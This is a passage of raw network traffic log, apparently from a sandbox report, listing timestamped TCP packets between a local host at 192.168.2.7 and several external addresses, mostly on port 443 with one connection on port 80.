Nov 9, 2024 02:47:37.252825022 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.252862930 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.252868891 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.252881050 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.252886057 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.252891064 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:37.252891064 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:37.252892017 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.252916098 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:37.252948999 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:37.252953053 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.252959013 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.252970934 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.252975941 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.252981901 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.253005028 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:37.253016949 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.253024101 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.253027916 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:37.253030062 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.253058910 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:37.253071070 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:37.253089905 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.253104925 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.253117085 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.253120899 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.253149033 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:37.253174067 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:37.287429094 CET	443	52977	40.126.32.68	192.168.2.7
Nov 9, 2024 02:47:37.287448883 CET	443	52977	40.126.32.68	192.168.2.7
Nov 9, 2024 02:47:37.287482977 CET	443	52977	40.126.32.68	192.168.2.7
Nov 9, 2024 02:47:37.287518024 CET	52977	443	192.168.2.7	40.126.32.68
Nov 9, 2024 02:47:37.287527084 CET	443	52977	40.126.32.68	192.168.2.7
Nov 9, 2024 02:47:37.287558079 CET	52977	443	192.168.2.7	40.126.32.68
Nov 9, 2024 02:47:37.287580967 CET	52977	443	192.168.2.7	40.126.32.68
Nov 9, 2024 02:47:37.291209936 CET	443	52977	40.126.32.68	192.168.2.7
Nov 9, 2024 02:47:37.291253090 CET	443	52977	40.126.32.68	192.168.2.7
Nov 9, 2024 02:47:37.291269064 CET	52977	443	192.168.2.7	40.126.32.68
Nov 9, 2024 02:47:37.291387081 CET	52977	443	192.168.2.7	40.126.32.68
Nov 9, 2024 02:47:37.300124884 CET	443	53071	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:37.300149918 CET	443	53071	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:37.300206900 CET	53071	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:37.300224066 CET	443	53071	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:37.300259113 CET	53071	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:37.300259113 CET	53071	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:37.300586939 CET	443	53071	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:37.300645113 CET	53071	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:37.305613041 CET	443	53071	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:37.305646896 CET	443	53071	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:37.305711985 CET	53071	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:37.305713892 CET	443	53071	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:37.305946112 CET	53071	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:37.372217894 CET	53071	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:37.372240067 CET	443	53071	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:37.405366898 CET	443	53073	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:37.407119989 CET	52977	443	192.168.2.7	40.126.32.68
Nov 9, 2024 02:47:37.407131910 CET	443	52977	40.126.32.68	192.168.2.7
Nov 9, 2024 02:47:37.407154083 CET	52977	443	192.168.2.7	40.126.32.68
Nov 9, 2024 02:47:37.407160044 CET	443	52977	40.126.32.68	192.168.2.7
Nov 9, 2024 02:47:37.429425001 CET	53073	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:37.429441929 CET	443	53073	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:37.430392027 CET	53073	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:37.430397034 CET	443	53073	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:37.457411051 CET	443	53072	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:37.457484007 CET	53072	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:37.461174011 CET	443	53074	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:37.469929934 CET	443	53075	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:37.479127884 CET	443	53072	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:37.479136944 CET	443	53072	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:37.479162931 CET	443	53072	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:37.479202032 CET	53072	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:37.479209900 CET	443	53072	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:37.479212999 CET	443	53072	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:37.479260921 CET	53072	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:37.560381889 CET	443	53073	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:37.560498953 CET	443	53073	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:37.560741901 CET	53073	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:37.603286028 CET	53079	443	192.168.2.7	13.89.178.27
Nov 9, 2024 02:47:37.603307962 CET	443	53079	13.89.178.27	192.168.2.7
Nov 9, 2024 02:47:37.603599072 CET	53079	443	192.168.2.7	13.89.178.27
Nov 9, 2024 02:47:37.604012966 CET	53079	443	192.168.2.7	13.89.178.27
Nov 9, 2024 02:47:37.604024887 CET	443	53079	13.89.178.27	192.168.2.7
Nov 9, 2024 02:47:37.614784002 CET	53080	443	192.168.2.7	13.89.178.27
Nov 9, 2024 02:47:37.614814043 CET	443	53080	13.89.178.27	192.168.2.7
Nov 9, 2024 02:47:37.614926100 CET	53080	443	192.168.2.7	13.89.178.27
Nov 9, 2024 02:47:37.615463972 CET	53080	443	192.168.2.7	13.89.178.27
Nov 9, 2024 02:47:37.615478992 CET	443	53080	13.89.178.27	192.168.2.7
Nov 9, 2024 02:47:37.617832899 CET	53074	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:37.617847919 CET	443	53074	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:37.618311882 CET	53074	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:37.618315935 CET	443	53074	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:37.627129078 CET	53075	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:37.627149105 CET	443	53075	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:37.627649069 CET	53075	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:37.627654076 CET	443	53075	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:37.628277063 CET	53073	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:37.628277063 CET	53073	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:37.628297091 CET	443	53073	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:37.628305912 CET	443	53073	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:37.644952059 CET	443	53072	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:37.644977093 CET	443	53072	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:37.645040989 CET	53072	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:37.645046949 CET	443	53072	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:37.645102024 CET	53072	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:37.649893045 CET	53081	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:37.649929047 CET	443	53081	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:37.649990082 CET	53081	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:37.650181055 CET	53081	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:37.650196075 CET	443	53081	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:37.652074099 CET	443	53078	23.198.7.184	192.168.2.7
Nov 9, 2024 02:47:37.653482914 CET	53078	443	192.168.2.7	23.198.7.184
Nov 9, 2024 02:47:37.653492928 CET	443	53078	23.198.7.184	192.168.2.7
Nov 9, 2024 02:47:37.654548883 CET	443	53078	23.198.7.184	192.168.2.7
Nov 9, 2024 02:47:37.654620886 CET	53078	443	192.168.2.7	23.198.7.184
Nov 9, 2024 02:47:37.656270027 CET	53078	443	192.168.2.7	23.198.7.184
Nov 9, 2024 02:47:37.656330109 CET	443	53078	23.198.7.184	192.168.2.7
Nov 9, 2024 02:47:37.666894913 CET	53078	443	192.168.2.7	23.198.7.184
Nov 9, 2024 02:47:37.666904926 CET	443	53078	23.198.7.184	192.168.2.7
Nov 9, 2024 02:47:37.671206951 CET	443	53076	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:37.694138050 CET	443	53077	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:37.715414047 CET	53076	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:37.715428114 CET	443	53076	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:37.715989113 CET	53076	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:37.715993881 CET	443	53076	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:37.716583967 CET	53077	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:37.716598988 CET	443	53077	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:37.717055082 CET	53077	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:37.717058897 CET	443	53077	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:37.744153976 CET	53078	443	192.168.2.7	23.198.7.184
Nov 9, 2024 02:47:37.746409893 CET	443	53074	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:37.746483088 CET	443	53074	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:37.746570110 CET	53074	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:37.756117105 CET	53074	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:37.756124973 CET	443	53074	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:37.756134033 CET	53074	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:37.756139040 CET	443	53074	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:37.758078098 CET	443	53075	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:37.758991003 CET	443	53075	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:37.759040117 CET	443	53075	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:37.759064913 CET	53075	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:37.759104967 CET	53075	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:37.764883995 CET	443	53072	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:37.764952898 CET	53072	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:37.800424099 CET	53075	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:37.800424099 CET	53075	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:37.800442934 CET	443	53075	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:37.800452948 CET	443	53075	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:37.835614920 CET	443	53078	23.198.7.184	192.168.2.7
Nov 9, 2024 02:47:37.836327076 CET	53082	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:37.836334944 CET	443	53078	23.198.7.184	192.168.2.7
Nov 9, 2024 02:47:37.836354017 CET	443	53082	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:37.836405993 CET	53078	443	192.168.2.7	23.198.7.184
Nov 9, 2024 02:47:37.836436987 CET	53082	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:37.837182999 CET	53078	443	192.168.2.7	23.198.7.184
Nov 9, 2024 02:47:37.837198019 CET	443	53078	23.198.7.184	192.168.2.7
Nov 9, 2024 02:47:37.844280005 CET	443	53077	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:37.844315052 CET	443	53077	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:37.844373941 CET	443	53077	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:37.844393015 CET	53077	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:37.844476938 CET	53077	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:37.845415115 CET	443	53076	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:37.845472097 CET	443	53076	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:37.845536947 CET	53076	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:37.874483109 CET	53082	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:37.874494076 CET	443	53082	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:37.874799967 CET	53077	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:37.874799967 CET	53077	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:37.874830008 CET	443	53077	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:37.874841928 CET	443	53077	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:37.876313925 CET	53076	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:37.876323938 CET	443	53076	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:37.876333952 CET	53076	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:37.876338959 CET	443	53076	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:37.899821043 CET	53083	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:37.899853945 CET	443	53083	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:37.900013924 CET	53083	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:37.900578022 CET	53083	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:37.900592089 CET	443	53083	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:38.002727032 CET	53084	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:38.002751112 CET	443	53084	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:38.002863884 CET	53084	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:38.004043102 CET	53085	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:38.004054070 CET	443	53085	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:38.004317045 CET	53085	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:38.008163929 CET	53084	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:38.008183002 CET	443	53084	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:38.008889914 CET	53085	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:38.008900881 CET	443	53085	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:38.013710976 CET	53086	443	192.168.2.7	40.126.32.68
Nov 9, 2024 02:47:38.013742924 CET	443	53086	40.126.32.68	192.168.2.7
Nov 9, 2024 02:47:38.013880014 CET	53086	443	192.168.2.7	40.126.32.68
Nov 9, 2024 02:47:38.014018059 CET	53086	443	192.168.2.7	40.126.32.68
Nov 9, 2024 02:47:38.014033079 CET	443	53086	40.126.32.68	192.168.2.7
Nov 9, 2024 02:47:38.058116913 CET	443	53072	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:38.058124065 CET	443	53072	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:38.058155060 CET	443	53072	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:38.058207035 CET	53072	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:38.058216095 CET	443	53072	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:38.058273077 CET	53072	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:38.171461105 CET	53087	443	192.168.2.7	23.198.7.184
Nov 9, 2024 02:47:38.171482086 CET	443	53087	23.198.7.184	192.168.2.7
Nov 9, 2024 02:47:38.171605110 CET	53087	443	192.168.2.7	23.198.7.184
Nov 9, 2024 02:47:38.171786070 CET	53087	443	192.168.2.7	23.198.7.184
Nov 9, 2024 02:47:38.171798944 CET	443	53087	23.198.7.184	192.168.2.7
Nov 9, 2024 02:47:38.284873962 CET	53088	443	192.168.2.7	13.89.178.27
Nov 9, 2024 02:47:38.284895897 CET	443	53088	13.89.178.27	192.168.2.7
Nov 9, 2024 02:47:38.285202980 CET	53088	443	192.168.2.7	13.89.178.27
Nov 9, 2024 02:47:38.285677910 CET	53088	443	192.168.2.7	13.89.178.27
Nov 9, 2024 02:47:38.285690069 CET	443	53088	13.89.178.27	192.168.2.7
Nov 9, 2024 02:47:38.298626900 CET	443	53072	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:38.298636913 CET	443	53072	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:38.298671007 CET	443	53072	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:38.298732996 CET	53072	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:38.298739910 CET	443	53072	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:38.298788071 CET	53072	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:38.334975958 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:38.335016012 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:38.339838028 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:38.339858055 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:38.382677078 CET	443	53079	13.89.178.27	192.168.2.7
Nov 9, 2024 02:47:38.382992983 CET	53079	443	192.168.2.7	13.89.178.27
Nov 9, 2024 02:47:38.383009911 CET	443	53079	13.89.178.27	192.168.2.7
Nov 9, 2024 02:47:38.384172916 CET	443	53079	13.89.178.27	192.168.2.7
Nov 9, 2024 02:47:38.384238005 CET	53079	443	192.168.2.7	13.89.178.27
Nov 9, 2024 02:47:38.384593010 CET	53079	443	192.168.2.7	13.89.178.27
Nov 9, 2024 02:47:38.384660959 CET	443	53079	13.89.178.27	192.168.2.7
Nov 9, 2024 02:47:38.385251999 CET	53079	443	192.168.2.7	13.89.178.27
Nov 9, 2024 02:47:38.385261059 CET	443	53079	13.89.178.27	192.168.2.7
Nov 9, 2024 02:47:38.385358095 CET	53079	443	192.168.2.7	13.89.178.27
Nov 9, 2024 02:47:38.385391951 CET	443	53079	13.89.178.27	192.168.2.7
Nov 9, 2024 02:47:38.390702963 CET	443	53080	13.89.178.27	192.168.2.7
Nov 9, 2024 02:47:38.390815973 CET	443	53081	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:38.391031981 CET	53080	443	192.168.2.7	13.89.178.27
Nov 9, 2024 02:47:38.391042948 CET	443	53080	13.89.178.27	192.168.2.7
Nov 9, 2024 02:47:38.391400099 CET	443	53080	13.89.178.27	192.168.2.7
Nov 9, 2024 02:47:38.391470909 CET	53081	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:38.391494989 CET	443	53081	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:38.391704082 CET	53080	443	192.168.2.7	13.89.178.27
Nov 9, 2024 02:47:38.391830921 CET	443	53080	13.89.178.27	192.168.2.7
Nov 9, 2024 02:47:38.391923904 CET	53080	443	192.168.2.7	13.89.178.27
Nov 9, 2024 02:47:38.391978025 CET	53080	443	192.168.2.7	13.89.178.27
Nov 9, 2024 02:47:38.392013073 CET	443	53080	13.89.178.27	192.168.2.7
Nov 9, 2024 02:47:38.392174006 CET	53081	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:38.392179012 CET	443	53081	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:38.418673038 CET	443	53072	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:38.418752909 CET	53072	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:38.441086054 CET	443	53072	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:38.441147089 CET	443	53072	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:38.441164017 CET	53072	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:38.441205025 CET	53072	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:38.441380024 CET	53072	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:38.441385031 CET	443	53072	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:38.522075891 CET	443	53081	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:38.522222996 CET	443	53081	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:38.522310972 CET	53081	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:38.526973009 CET	53089	443	192.168.2.7	13.89.178.27
Nov 9, 2024 02:47:38.526998043 CET	443	53089	13.89.178.27	192.168.2.7
Nov 9, 2024 02:47:38.527189970 CET	53089	443	192.168.2.7	13.89.178.27
Nov 9, 2024 02:47:38.527621984 CET	53089	443	192.168.2.7	13.89.178.27
Nov 9, 2024 02:47:38.527635098 CET	443	53089	13.89.178.27	192.168.2.7
Nov 9, 2024 02:47:38.533231974 CET	53081	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:38.533255100 CET	443	53081	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:38.533268929 CET	53081	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:38.533274889 CET	443	53081	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:38.533912897 CET	443	53080	13.89.178.27	192.168.2.7
Nov 9, 2024 02:47:38.534678936 CET	53080	443	192.168.2.7	13.89.178.27
Nov 9, 2024 02:47:38.534724951 CET	443	53080	13.89.178.27	192.168.2.7
Nov 9, 2024 02:47:38.534800053 CET	53080	443	192.168.2.7	13.89.178.27
Nov 9, 2024 02:47:38.544084072 CET	53090	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:38.544102907 CET	443	53090	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:38.544167042 CET	53090	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:38.545612097 CET	443	53079	13.89.178.27	192.168.2.7
Nov 9, 2024 02:47:38.546124935 CET	53079	443	192.168.2.7	13.89.178.27
Nov 9, 2024 02:47:38.546169043 CET	443	53079	13.89.178.27	192.168.2.7
Nov 9, 2024 02:47:38.546329975 CET	443	53079	13.89.178.27	192.168.2.7
Nov 9, 2024 02:47:38.546380997 CET	53079	443	192.168.2.7	13.89.178.27
Nov 9, 2024 02:47:38.546406031 CET	53079	443	192.168.2.7	13.89.178.27
Nov 9, 2024 02:47:38.554789066 CET	53090	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:38.554800987 CET	443	53090	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:38.596209049 CET	443	53082	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:38.603151083 CET	53082	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:38.603168011 CET	443	53082	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:38.603935957 CET	53082	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:38.603941917 CET	443	53082	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:38.654000998 CET	443	53083	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:38.654990911 CET	53083	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:38.655002117 CET	443	53083	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:38.655544043 CET	53083	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:38.655549049 CET	443	53083	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:38.727607012 CET	443	53082	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:38.727691889 CET	443	53082	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:38.727873087 CET	53082	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:38.728935957 CET	53082	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:38.728949070 CET	443	53082	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:38.728976011 CET	53082	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:38.728981018 CET	443	53082	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:38.734592915 CET	53091	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:38.734635115 CET	443	53091	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:38.734832048 CET	53091	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:38.735745907 CET	53091	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:38.735764980 CET	443	53091	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:38.740307093 CET	443	53085	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:38.740755081 CET	53085	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:38.740771055 CET	443	53085	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:38.741311073 CET	53085	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:38.741317034 CET	443	53085	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:38.742110968 CET	443	53084	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:38.742468119 CET	53084	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:38.742491961 CET	443	53084	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:38.742887974 CET	53084	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:38.742893934 CET	443	53084	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:38.793106079 CET	443	53083	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:38.793261051 CET	443	53087	23.198.7.184	192.168.2.7
Nov 9, 2024 02:47:38.793708086 CET	53087	443	192.168.2.7	23.198.7.184
Nov 9, 2024 02:47:38.793720007 CET	443	53087	23.198.7.184	192.168.2.7
Nov 9, 2024 02:47:38.794078112 CET	443	53087	23.198.7.184	192.168.2.7
Nov 9, 2024 02:47:38.794626951 CET	53087	443	192.168.2.7	23.198.7.184
Nov 9, 2024 02:47:38.794692993 CET	443	53087	23.198.7.184	192.168.2.7
Nov 9, 2024 02:47:38.794941902 CET	443	53083	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:38.795003891 CET	53083	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:38.811805010 CET	53083	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:38.811825037 CET	443	53083	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:38.811863899 CET	53083	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:38.811871052 CET	443	53083	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:38.818190098 CET	53092	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:38.818221092 CET	443	53092	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:38.818325996 CET	53092	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:38.819302082 CET	53092	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:38.819319963 CET	443	53092	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:38.869923115 CET	443	53085	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:38.869956017 CET	443	53085	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:38.870011091 CET	443	53085	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:38.870043993 CET	53085	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:38.870059013 CET	53085	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:38.872324944 CET	443	53084	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:38.872383118 CET	443	53084	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:38.872438908 CET	53084	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:38.884543896 CET	53087	443	192.168.2.7	23.198.7.184
Nov 9, 2024 02:47:38.900882006 CET	53085	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:38.900890112 CET	443	53085	13.107.246.45	192.168.2.7
